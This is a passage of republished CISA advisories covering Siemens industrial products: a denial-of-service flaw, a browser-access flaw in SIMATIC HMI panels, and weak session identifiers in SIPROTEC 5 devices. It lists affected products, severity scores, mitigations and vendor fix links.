XR524-8C, 2x230V (L3 int.) (6GK5524-8GR00-4AR2), SCALANCE XR526-8C, 1x230V (6GK5526-8GS00-3AR2), SCALANCE XR526-8C, 1x230V (L3 int.) (6GK5526-8GR00-3AR2), SCALANCE XR526-8C, 24V (6GK5526-8GS00-2AR2), SCALANCE XR526-8C, 24V (L3 int.) (6GK5526-8GR00-2AR2), SCALANCE XR526-8C, 2x230V (6GK5526-8GS00-4AR2), SCALANCE XR526-8C, 2x230V (L3 int.) (6GK5526-8GR00-4AR2), SCALANCE XR528-6M (6GK5528-0AA00-2AR2), SCALANCE XR528-6M (2HR2, L3 int.) (6GK5528-0AR00-2HR2), SCALANCE XR528-6M (2HR2) (6GK5528-0AA00-2HR2), SCALANCE XR528-6M (L3 int.) (6GK5528-0AR00-2AR2), SCALANCE XR552-12M (6GK5552-0AA00-2AR2), SCALANCE XR552-12M (2HR2, L3 int.) (6GK5552-0AR00-2AR2), SCALANCE XR552-12M (2HR2) (6GK5552-0AA00-2HR2), SCALANCE XR552-12M (2HR2) (6GK5552-0AR00-2HR2), SIMATIC CFU DIQ (6ES7655-5PX31-1XX0), SIMATIC CFU PA (6ES7655-5PX11-0XX0), SIMATIC CFU PA (6ES7655-5PX11-1XX0), SIMATIC ET 200pro IM 154-8 PN/DP CPU (6ES7154-8AB01-0AB0), SIMATIC ET 200pro IM 154-8F PN/DP CPU (6ES7154-8FB01-0AB0), SIMATIC ET 200pro IM 154-8FX PN/DP CPU (6ES7154-8FX00-0AB0), SIMATIC ET 200S IM 151-8 PN/DP CPU (6ES7151-8AB01-0AB0), SIMATIC ET 200S IM 151-8F PN/DP CPU (6ES7151-8FB01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP HA IM155-6 PN, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0), SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0), SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0), SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0), SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0), SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0), SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0), SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0), SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0), SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0), SIMATIC S7-400 CPU 412-2 PN V7 (6ES7412-2EK07-0AB0), SIMATIC S7-400 CPU 414-3 PN/DP V7 (6ES7414-3EM07-0AB0), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (6ES7414-3FM07-0AB0), SIMATIC S7-400 CPU 416-3 PN/DP V7 (6ES7416-3ES07-0AB0), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (6ES7416-3FS07-0AB0), SIMATIC S7-400 H V6 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants), SIMIT UNIT V10, SIMIT UNIT V11, SINAMICS CBE20, SINAMICS G115D, SINAMICS G120 (incl. SIPLUS variants), SINAMICS G120C, SINAMICS G120D, SINAMICS G120X, SINAMICS G120XA, SINAMICS G130, SINAMICS G150, SINAMICS S110, SINAMICS S120 (incl. SIPLUS variants), SINAMICS S150, SINUMERIK 840D sl, SIPLUS ET 200S IM 151-8 PN/DP CPU (6AG1151-8AB01-7AB0), SIPLUS ET 200S IM 151-8F PN/DP CPU (6AG1151-8FB01-2AB0), SIPLUS NET IE/PB link PN IO (6AG1411-5AB10-2AA0), SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0), SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0), SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0), SIPLUS S7-300 CPU 317-2 PN/DP (6AG1317-2EK14-7AB0), SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0), SIPLUS S7-400 CPU 414-3 PN/DP V7 (6AG1414-3EM07-7AB0), SIPLUS S7-400 CPU 416-3 PN/DP V7 (6AG1416-3ES07-7AB0), SITOP PSU8600 1AC 20 A/4x5 A PN (6EP3336-8MB00-2CY0), SITOP PSU8600 3AC 20 A PN (6EP3436-8SB00-2AY0), SITOP PSU8600 3AC 20 A/4x5 A PN (6EP3436-8MB00-2CY0), SITOP PSU8600 3AC 40 A PN (6EP3437-8SB00-2AY0), SITOP PSU8600 3AC 40 A/4x10 A PN (6EP3437-8MB00-2CY0), SITOP PSU8600 3AC 40 A/4x10A EIP (6EP3437-8MB10-2CY0), SITOP UPS1600 10 A Ethernet/ PROFINET (6EP4134-3AB00-2AY0), SITOP UPS1600 20 A Ethernet/ PROFINET (6EP4136-3AB00-2AY0), SITOP UPS1600 40 A Ethernet/ PROFINET (6EP4137-3AB00-2AY0), SITOP UPS1600 EX 20 A Ethernet PROFINET (6EP4136-3AC00-2AY0) Product Status: known_affected Remediations Mitigation As a mitigation, disable the ethernet ports on the CPU and use a communication module (like CP) for communication instead Mitigation Restrict access to the affected systems to trusted IP addresses only No fix planned Currently no fix is planned None available Currently no fix is available Vendor fix Update to V10.2 or later version https://support.industry.siemens.com/cs/ww/en/view/109773044/ Vendor fix Update to V2.0.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109781049/ Vendor fix Update to V2.0.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109754628/ Vendor fix Update to V3.2.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109992747/ Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Vendor fix Update to V8.3 or later version https://support.industry.siemens.com/cs/ww/en/view/109476571/ Vendor fix Update to V8.3 or later version https://support.industry.siemens.com/cs/ww/en/view/109989310/ Vendor fix Update to V1.3 or later version Vendor fix https://support.industry.siemens.com/cs/ww/en/view/1029552/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-392349 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-392349 advisory Legal Notice and Terms of Use

View CSAF Summary SIMATIC HMI Unified Comfort Panels before V21.0 are affected by a vulnerability that allows an unauthenticated attacker to access the web browser via the help link. This vulnerability allows an attacker to access the web browser through the Control Panel if it is not protected by the corresponding security mechanisms. This opens the possibility for the attacker to find backdoors, which might lead to unwanted misconfigurations. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens SIMATIC are affected: SIMATIC HMI MTP1000 Unified Comfort Panel (6AV2128-3KB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1000 Unified Comfort Panel hygienic (6AV2128-3KB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1000 Unified Comfort Panel hygienic neutral design (6AV2128-3KB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1000, Unified Comfort Panel neutral (6AV2128-3KB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3MB27-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3MB27-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3MB27-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3MB57-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3MB57-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3MB57-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Unified Comfort Panel (6AV2128-3MB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Unified Comfort Panel hygienic (6AV2128-3MB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Unified Comfort Panel hygienic neutral design (6AV2128-3MB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1200 Unified Comfort Panel neutral design (6AV2128-3MB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3QB27-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3QB27-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3QB27-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3QB57-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3QB57-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3QB57-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Unified Comfort Panel (6AV2128-3QB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Unified Comfort Panel hygienic (6AV2128-3QB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Unified Comfort Panel hygienic neutral design (6AV2128-3QB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1500 Unified Comfort Panel neutral design (6AV2128-3QB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3UB27-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3UB27-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3UB27-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3UB57-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3UB57-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3UB57-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Unified Comfort Panel (6AV2128-3UB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Unified Comfort Panel hygienic (6AV2128-3UB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Unified Comfort Panel hygienic neutral design (6AV2128-3UB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP1900 Unified Comfort Panel neutral design (6AV2128-3UB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3XB27-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3XB27-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3XB27-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3XB57-1BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3XB57-0BX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3XB57-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Unified Comfort Hygienic (6AV2128-3XB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Unified Comfort Hygienic neutral design (6AV2128-3XB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Unified Comfort Panel (6AV2128-3XB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP2200 Unified Comfort Panel neutral design (6AV2128-3XB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP700 Unified Comfort Panel (6AV2128-3GB06-0AX1) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB40-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB70-0AX0) vers:intdot/<21 (CVE-2026-27662) SIMATIC HMI MTP700, Unified Comfort Panel neutral design (6AV2128-3GB36-0AX1) vers:intdot/<21 (CVE-2026-27662) SIPLUS HMI MTP1000 Unified Comfort (6AG1128-3KB06-4AX1) vers:intdot/<21 (CVE-2026-27662) SIPLUS HMI MTP1200 Unified Comfort (6AG1128-3MB06-4AX1) vers:intdot/<21 (CVE-2026-27662) SIPLUS HMI MTP700 Unified Comfort (6AG1128-3GB06-4AX1) vers:intdot/<21 (CVE-2026-27662) CVSS Vendor Equipment Vulnerabilities v3 7.7 Siemens Siemens SIMATIC Initialization of a Resource with an Insecure Default Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-27662 Affected devices do not properly restrict access to the web browser via the Control Panel when no corresponding security mechanisms are in place. This could allow an unauthenticated attacker to gain unauthorized access to the web browser, potentially enabling the discovery of backdoors, performing unauthorized actions, or exploiting misconfigurations that may lead to further system compromise. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC HMI MTP1000 Unified Comfort Panel (6AV2128-3KB06-0AX1), SIMATIC HMI MTP1000 Unified Comfort Panel hygienic (6AV2128-3KB40-0AX0), SIMATIC HMI MTP1000 Unified Comfort Panel hygienic neutral design (6AV2128-3KB70-0AX0), SIMATIC HMI MTP1000, Unified Comfort Panel neutral (6AV2128-3KB36-0AX1), SIMATIC HMI MTP1200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3MB27-1BX0), SIMATIC HMI MTP1200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3MB27-0BX0), SIMATIC HMI MTP1200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3MB27-0AX0), SIMATIC HMI MTP1200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3MB57-1BX0), SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3MB57-0BX0), SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3MB57-0AX0), SIMATIC HMI MTP1200 Unified Comfort Panel (6AV2128-3MB06-0AX1), SIMATIC HMI MTP1200 Unified Comfort Panel hygienic (6AV2128-3MB40-0AX0), SIMATIC HMI MTP1200 Unified Comfort Panel hygienic neutral design (6AV2128-3MB70-0AX0), SIMATIC HMI MTP1200 Unified Comfort Panel neutral design (6AV2128-3MB36-0AX1), SIMATIC HMI MTP1500 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3QB27-1BX0), SIMATIC HMI MTP1500 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3QB27-0BX0), SIMATIC HMI MTP1500 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3QB27-0AX0), SIMATIC HMI MTP1500 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3QB57-1BX0), SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3QB57-0BX0), SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3QB57-0AX0), SIMATIC HMI MTP1500 Unified Comfort Panel (6AV2128-3QB06-0AX1), SIMATIC HMI MTP1500 Unified Comfort Panel hygienic (6AV2128-3QB40-0AX0), SIMATIC HMI MTP1500 Unified Comfort Panel hygienic neutral design (6AV2128-3QB70-0AX0), SIMATIC HMI MTP1500 Unified Comfort Panel neutral design (6AV2128-3QB36-0AX1), SIMATIC HMI MTP1900 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3UB27-1BX0), SIMATIC HMI MTP1900 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3UB27-0BX0), SIMATIC HMI MTP1900 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3UB27-0AX0), SIMATIC HMI MTP1900 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3UB57-1BX0), SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3UB57-0BX0), SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3UB57-0AX0), SIMATIC HMI MTP1900 Unified Comfort Panel (6AV2128-3UB06-0AX1), SIMATIC HMI MTP1900 Unified Comfort Panel hygienic (6AV2128-3UB40-0AX0), SIMATIC HMI MTP1900 Unified Comfort Panel hygienic neutral design (6AV2128-3UB70-0AX0), SIMATIC HMI MTP1900 Unified Comfort Panel neutral design (6AV2128-3UB36-0AX1), SIMATIC HMI MTP2200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3XB27-1BX0), SIMATIC HMI MTP2200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3XB27-0BX0), SIMATIC HMI MTP2200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3XB27-0AX0), SIMATIC HMI MTP2200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3XB57-1BX0), SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3XB57-0BX0), SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3XB57-0AX0), SIMATIC HMI MTP2200 Unified Comfort Hygienic (6AV2128-3XB40-0AX0), SIMATIC HMI MTP2200 Unified Comfort Hygienic neutral design (6AV2128-3XB70-0AX0), SIMATIC HMI MTP2200 Unified Comfort Panel (6AV2128-3XB06-0AX1), SIMATIC HMI MTP2200 Unified Comfort Panel neutral design (6AV2128-3XB36-0AX1), SIMATIC HMI MTP700 Unified Comfort Panel (6AV2128-3GB06-0AX1), SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB40-0AX0), SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB70-0AX0), SIMATIC HMI MTP700, Unified Comfort Panel neutral design (6AV2128-3GB36-0AX1), SIPLUS HMI MTP1000 Unified Comfort (6AG1128-3KB06-4AX1), SIPLUS HMI MTP1200 Unified Comfort (6AG1128-3MB06-4AX1), SIPLUS HMI MTP700 Unified Comfort (6AG1128-3GB06-4AX1) Product Status: known_affected Remediations Mitigation Compliance with the security guidelines is strongly recommended (specially chapter “3.2 Ending HMI runtime”, “3.4.1 Enable access protection for the Control Panel” and “3.4.2 Changing runtime autostart) https://support.industry.siemens.com/cs/ww/en/view/109481300 Mitigation Disable the taskbar which can be configured in the Control Panel > System Properties > Taskbar. Vendor fix Update to V21 or later version https://support.industry.siemens.com/cs/ww/en/view/109825605/ Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-387223 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-387223 advisory Legal Notice and Terms of Use

View CSAF Summary The SIPROTEC 5 devices do not use sufficiently random numbers to generate session identifiers. This could facilitate a brute-force attack against a valid session identifier which could allow an unauthenticated remote attacker to hijack a valid user session. The affected session identifiers are only used in a subset of the endpoints that are provided by the affected products. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet available. The following versions of Siemens SIPROTEC 5 are affected: SIPROTEC 5 6MD84 (CP300) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 6MD85 (CP200) vers:all/* () SIPROTEC 5 6MD85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 6MD86 (CP200) vers:all/* () SIPROTEC 5 6MD86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 6MD89 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 6MU85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7KE85 (CP200) vers:all/* () SIPROTEC 5 7KE85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SA82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SA82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SA84 (CP200) vers:all/* () SIPROTEC 5 7SA86 (CP200) vers:all/* () SIPROTEC 5 7SA86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SA87 (CP200) vers:all/* () SIPROTEC 5 7SA87 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SD82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SD82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SD84 (CP200) vers:all/* () SIPROTEC 5 7SD86 (CP200) vers:all/* () SIPROTEC 5 7SD86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SD87 (CP200) vers:all/* () SIPROTEC 5 7SD87 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SJ81 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SJ81 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SJ82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SJ82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SJ85 (CP200) vers:all/* () SIPROTEC 5 7SJ85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SJ86 (CP200) vers:all/* () SIPROTEC 5 7SJ86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SK82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SK82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SK85 (CP200) vers:all/* () SIPROTEC 5 7SK85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SL82 (CP100) vers:intdot/>=7.80 (CVE-2024-54017) SIPROTEC 5 7SL82 (CP150) vers:intdot/<11.0 (CVE-2024-54017) SIPROTEC 5 7SL86 (CP200) vers:all/* () SIPROTEC 5 7SL86 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SL87 (CP200) vers:all/* () SIPROTEC 5 7SL87 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7SS85 (CP200) vers:all/* () SIPROTEC 5 7SS85 (CP300) vers:intdot/>=7.80|<11.0 (CVE-2024-54017) SIPROTEC 5 7ST85 (CP200) vers:all/* () 